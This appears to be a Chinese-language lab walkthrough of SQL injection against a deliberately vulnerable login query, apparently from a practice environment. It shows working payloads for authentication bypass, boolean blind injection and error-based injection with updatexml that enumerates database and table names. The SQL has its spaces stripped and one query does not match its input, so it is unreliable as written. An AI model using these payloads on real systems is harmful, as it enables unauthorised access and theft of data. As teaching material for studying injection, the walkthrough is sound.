后台代码:
SELECTusername,passwordFROMusersWHEREusername='$uname'andpassword='$passwd'LIMIT0,1
输入账号:Dumb密码:Dumb2
SELECTusername,passwordFROMusersWHEREusername='Dumb'andpassword='Dumb2'LIMIT0,1
绕过登录:
输入账号:aaa密码:1'or1=1#
SELECTusername,passwordFROMusersWHEREusername='aaa'andpassword='1'or1=1#'LIMIT0,1
Sql注入1:盲注
输入账号:Dumb密码:Dumb'andlength(database())=8#
SELECTusername,passwordFROMusersWHEREusername='Dumb'andpassword='Dumb'andlength(database())=8#'LIMIT0,1
security
输入账号:Dumb密码:Dumb'andascii(substr(database(),1,1))=115#
SELECTusername,passwordFROMusersWHEREusername='Dumb'andpassword='Dumb'andascii(substr(database(),2,1))=115#LIMIT0,1
Sql注入2:报错
输入账号:aaa密码:aaa'andupdatexml(1,concat(0x23,database()),1)#
SELECTusername,passwordFROMusersWHEREusername='aaa'andpassword='aaa'andupdatexml(1,concat(0x23,database()),1)#'LIMIT0,1
输入账号:aaa密码:aaa'andupdatexml(1,concat(0x23,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security')),1)#